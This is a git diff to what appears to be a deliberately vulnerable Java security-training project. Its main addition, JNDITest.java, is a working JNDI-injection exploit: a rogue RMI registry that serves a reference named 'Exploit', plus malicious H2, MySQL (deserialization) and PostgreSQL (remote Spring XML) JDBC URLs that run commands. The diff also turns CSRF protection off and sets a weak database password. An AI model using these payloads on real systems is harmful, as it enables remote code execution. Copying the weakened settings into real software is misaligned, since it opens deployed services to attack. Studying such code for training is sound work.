diff --git a/pom.xml b/pom.xml
index 751a4b35..1c36a68c 100644
--- a/pom.xml
+++ b/pom.xml
@@ -306,6 +306,28 @@
5.8.10
+
+
+ org.postgresql
+ postgresql
+ 42.3.1
+
+
+ org.apache.commons
+ commons-dbcp2
+ 2.0
+
+
+ com.h2database
+ h2
+ 1.4.200
+
+
+ org.apache.tomcat
+ tomcat-dbcp
+ 9.0.40
+
+
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
index ada8a394..61ffd957 100644
--- a/src/main/java/org/joychou/controller/Log4j.java
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -3,6 +3,7 @@
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
@@ -16,7 +17,7 @@ public class Log4j {
* Fix: Update log4j to lastet version.
* @param token token
*/
- @GetMapping("/log4j")
+ @RequestMapping("/log4j")
public String log4j(String token) {
if(token.equals("java-sec-code")) {
return "java sec code";
diff --git a/src/main/java/org/joychou/util/JNDITest.java b/src/main/java/org/joychou/util/JNDITest.java
new file mode 100644
index 00000000..37f9e446
--- /dev/null
+++ b/src/main/java/org/joychou/util/JNDITest.java
@@ -0,0 +1,97 @@
+package org.joychou.util;
+
+
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.sql.DriverManager;
+import java.sql.SQLException;
+import java.util.HashMap;
+
+
+public class JNDITest {
+ public static String tomcat_dbcp2_factory = "org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory";
+ public static String tomcat_dbcp1_factory = "org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory";
+ public static String commons_dbcp2_factory = "org.apache.commons.dbcp2.BasicDataSourceFactory";
+ public static String commons_dbcp1_factory = "org.apache.commons.dbcp.BasicDataSourceFactory";
+
+ public static String H2_JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
+ "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
+ "java.lang.Runtime.getRuntime().exec('calc')\n" +
+ "$$\n";
+ // 需要伪造Mysql服务器的返回,利用工具:https://github.com/fnmsd/MySQL_Fake_Server
+ public static String MYSQL_JDBC_URL = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_cc6";
+
+
+ private static Reference buildRef(HashMap addrs, String factory, String JDBC_URL) {
+
+ Reference ref = new Reference("javax.sql.DataSource", factory, null);
+ ref.add(new StringRefAddr("url", JDBC_URL));
+ // 使用 Lambda 表达式遍历 HashMap
+ addrs.forEach((key, value) -> {
+ ref.add(new StringRefAddr(key, value));
+ });
+ return ref;
+ }
+
+ private static HashMap genH2ReferenceAddr() {
+ HashMap hashMap = new HashMap<>();
+ hashMap.put("driverClassName", "org.h2.Driver");
+ hashMap.put("username", "root");
+ hashMap.put("password", "password");
+ hashMap.put("initialSize", "1");
+ return hashMap;
+ }
+
+ private static HashMap genMysqlReferenceAddr() {
+ HashMap hashMap = new HashMap<>();
+ hashMap.put("driverClassName", "com.mysql.jdbc.Driver");
+ hashMap.put("initialSize", "1");
+ return hashMap;
+ }
+
+ public static void JNDIstart() throws Exception {
+ Registry registry = LocateRegistry.createRegistry(1099);
+ Reference reference = buildRef(genMysqlReferenceAddr(), tomcat_dbcp2_factory, MYSQL_JDBC_URL);
+ ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+ registry.bind("Exploit", referenceWrapper);
+ System.out.println("Creating evil RMI registry on port 1099");
+ }
+
+
+ public static void postgresqlTest() throws SQLException {
+ /*
+ python启用ftp服务器python3 -m pyftpdlib -d .
+ ftp服务器上的test.xml内容:
+
+
+
+
+
+ calc
+
+
+
+
+ */
+ DriverManager.getConnection("jdbc:postgresql://localhost:5432/testdb?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=ftp://127.0.0.1:2121/test.xml");
+ }
+
+ /**
+ * 参考链接:
+ * https://tttang.com/archive/1405/
+ * https://tttang.com/archive/1462/
+ * @param args
+ * @throws Exception
+ */
+ public static void main(String[] args) throws Exception {
+ JNDIstart();
+
+ }
+}
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 96ca82c3..669dd468 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,7 +1,7 @@
spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
spring.datasource.username=root
-spring.datasource.password=woshishujukumima
+spring.datasource.password=root
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.mapper-locations=classpath:mapper/*.xml
# mybatis SQL log
@@ -28,7 +28,7 @@ joychou.security.referer.uri = /jsonp/**
### csrf configuration begins ###
# csrf token check
-joychou.security.csrf.enabled = true
+joychou.security.csrf.enabled = false
# URI without CSRF check (only support ANT url format)
joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**, /ssrf/**
# method for CSRF check